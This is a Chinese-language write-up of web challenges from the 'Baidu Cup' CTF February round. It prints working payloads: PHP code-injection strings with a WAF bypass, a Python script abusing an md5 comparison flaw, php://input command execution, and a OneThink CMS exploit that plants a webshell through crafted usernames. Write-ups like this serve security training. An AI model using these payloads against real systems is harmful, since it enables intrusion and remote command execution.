“百度杯”CTF比赛(二月场)-web-writeup
爆破一:
打开网页看到源代码:
根据提示这题就是找变量的值,本想爆破,但不太现实。百度 php获取变量的值 有个超全局数组 $GLOBALS
爆破二:
打开网页看到源代码:
看到了eval() 函数,想到命令执行
提示不在变量中,应该再flag.php中
Exp:
?hello=);system("cat flag.php");//
闭合前面,注释后面
但有一个问题,就是会被i春秋自己的waf挡,我们改成post,然后传一个参数,让其值大约2万个左右。
爆破三:
打开网页看到源代码:
有三个SESSION变量 nums:计数 time:记时 whoami:有个初始值 然后将$str_rands 生成的随机字符赋值给它。
$str_rands 就是生成2位随机的26字母
当满足$_SESSION['whoami']==($value[0].$value[1]) && substr(md5($value),5,4)==0 ,nums+1
写个脚本测试发现当md5(数组),条件即为真。
<?php error_reporting(0); $arr=$_GET['a']; if (substr(md5($arr),5,4)==0){ echo 'yes'; } else{ echo 'no'; } ?>
所以第一次访问
http://3f53732255ce43aa94a40161e40bc03de58dbfefb0d14523.ctf.game/?value[0]=e&value[1]=a
后面依次传值,10以上就行。
Python脚本:
#!usr/bin/env python #!coding=utf-8 __author__ = 'zhengjim' import requests aa = requests.session() code = aa.get('http://3f53732255ce43aa94a40161e40bc03de58dbfefb0d14523.ctf.game/?value[0]=e&value[1]=a').text # print code cc = code[:2] for i in xrange(10): url = 'http://3f53732255ce43aa94a40161e40bc03de58dbfefb0d14523.ctf.game/index.php?value[0]={}&value[1]={}'.format(cc[0],cc[1]) flag= aa.get(url=url).text cc = flag[:2] print flag
include:
看到allow_url_include开启:
直接 php://input就行啦
先ls看有什么文件,然后cat。
zone:
没写出来。
参考:http://www.cnblogs.com/Mrsm1th/p/6600876.html
利用nginx 配置不当导致目录遍历下载漏洞。
onethink:
百度找到onethinnk的一个漏洞。
参考:http://www.hackdig.com/06/hack-36510.htm
就是注册个账号为:
%250a%24a%3d%24_GET%5ba%5d%3b%2f%2f%250aecho+%60%24a%60%3b%2f%2f的账号, 但因为账号长度有限制。所以分别两个来注册
账号一:%0a$a=$_GET[a];//
账号二:%0aecho `$a`;//
用burp来改包,不然会失败。
依次登入,也要用burp来改包登入。
然后访问/Runtime/Temp/2bb202459c30a1628513f40ab22fa01a.php
查找下flag位置 cat就行了。
/Runtime/Temp/2bb202459c30a1628513f40ab22fa01a.php?a=cat ../../flag.php
